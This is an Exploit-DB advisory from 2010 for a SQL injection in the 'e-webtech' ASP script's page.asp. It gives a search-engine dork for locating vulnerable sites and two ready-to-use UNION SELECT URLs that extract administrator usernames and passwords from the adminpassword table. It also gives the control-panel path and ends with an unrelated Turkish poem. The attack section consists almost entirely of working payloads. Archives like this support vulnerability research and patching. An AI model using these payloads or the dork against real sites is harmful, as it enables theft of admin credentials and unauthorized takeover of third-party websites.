e-webtech - 'page.asp' SQL Injection

EDB-ID:

12571

CVE:

N/A


Author:

CoBRa_21

Type:

webapps


Platform:

ASP

Date:

2010-05-11


-------------------------------------------------------------------------------------------
 
e-webtech (page.asp) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Name: e-webtech
 
Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------
 
User Exploit:
 
http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword
 
Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

Öyle bir özlemişim ki seni
Artık dönsen de olur dönmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
Dağları deviriverdin üstüme hiç çekinmedin
Ben bu şehirde bir daha da sabah görmedim
Günaydınlar olmadı günler aymadı sensiz ........

-------------------------------------------------------------------------------------------